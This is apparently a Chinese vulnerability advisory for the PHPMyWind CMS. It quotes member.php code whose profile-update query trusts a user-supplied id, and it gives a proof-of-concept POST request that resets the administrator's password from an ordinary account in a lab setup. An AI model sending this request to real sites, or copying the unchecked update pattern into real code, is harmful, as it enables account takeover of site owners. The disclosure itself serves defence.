<ul><li>/member.php</li></ul><pre class="">//初始化参数 …… $id = isset($id) ? intval($id) : 0; …… //更新资料 else if($a == 'saveedit') { //检测数据完整性 if($password!=$repassword or $email=='') { header('location:?c=edit'); exit(); } //HTML转义变量 .... //检测旧密码是否正确 if($password != '') { $oldpassword = md5(md5($oldpassword)); $r = $dosql->GetOne("SELECT `password` FROM `#@__member` WHERE `username`='$c_uname'"); if($r['password'] != $oldpassword) { ShowMsg('抱歉,旧密码错误!','-1'); exit(); } } $sql = "UPDATE `#@__member` SET "; if($password != '') { $password = md5(md5($password)); $sql .= "password='$password', "; } @$sql .= "question='$question', answer='$answer', cnname='$cnname', enname='$enname', sex='$sex', birthtype='$birthtype', birth_year='$birth_year', birth_month='$birth_month', birth_day='$birth_day', astro='$astro', bloodtype='$bloodtype', trade='$trade', live_prov='$live_prov', live_city='$live_city', live_country='$live_country', home_prov='$home_prov', home_city='$home_city',...
<ul><li>/member.php</li></ul><pre class="">//初始化参数 …… $id = isset($id) ? intval($id) : 0; …… //更新资料 else if($a == 'saveedit') { //检测数据完整性 if($password!=$repassword or $email=='') { header('location:?c=edit'); exit(); } //HTML转义变量 .... //检测旧密码是否正确 if($password != '') { $oldpassword = md5(md5($oldpassword)); $r = $dosql->GetOne("SELECT `password` FROM `#@__member` WHERE `username`='$c_uname'"); if($r['password'] != $oldpassword) { ShowMsg('抱歉,旧密码错误!','-1'); exit(); } } $sql = "UPDATE `#@__member` SET "; if($password != '') { $password = md5(md5($password)); $sql .= "password='$password', "; } @$sql .= "question='$question', answer='$answer', cnname='$cnname', enname='$enname', sex='$sex', birthtype='$birthtype', birth_year='$birth_year', birth_month='$birth_month', birth_day='$birth_day', astro='$astro', bloodtype='$bloodtype', trade='$trade', live_prov='$live_prov', live_city='$live_city', live_country='$live_country', home_prov='$home_prov', home_city='$home_city', home_country='$home_country', cardtype='$cardtype', cardnum='$cardnum', intro='$intro', email='$email', qqnum='$qqnum', mobile='$mobile', telephone='$telephone', address_prov='$address_prov', address_city='$address_city', address_country='$address_country', address='$address', zipcode='$zipcode' WHERE id=$id"; if($dosql->ExecNoneQuery($sql)) { ShowMsg('资料更新成功!','?c=edit'); exit(); } } </pre><p>此处$id为用户传入的id,在修改密码的时候未验证id是否为用户本身,造成可以修改任意用户的资料以及密码。</p><p>注册用户,密码为123123,登录。</p><p>发送数据包到:</p><pre class="">http://10.211.55.3/phpmywind/member.php?e=saveedit</pre><p>内容为:</p><pre class="">oldpassword=123123&password=123123&repassword=123123&email=123%40asd.com&action=update&id=1</pre><p>id为管理员的id,提示修改成功。 </p><p><img alt="F239CB78-0D1E-48D6-BA41-E149C00F8F14.png" src="https://images.seebug.org/@/uploads/1434593982773-F239CB78-0D1E-48D6-BA41-E149C00F8F14.png" data-image-size="710,259"><br></p><p>用123123登录admin帐号。</p><p><img alt="1D1559B5-EA63-4E44-93F7-7B1CACF21C0E.png" src="https://images.seebug.org/@/uploads/1434593987952-1D1559B5-EA63-4E44-93F7-7B1CACF21C0E.png" data-image-size="564,226"><br></p>
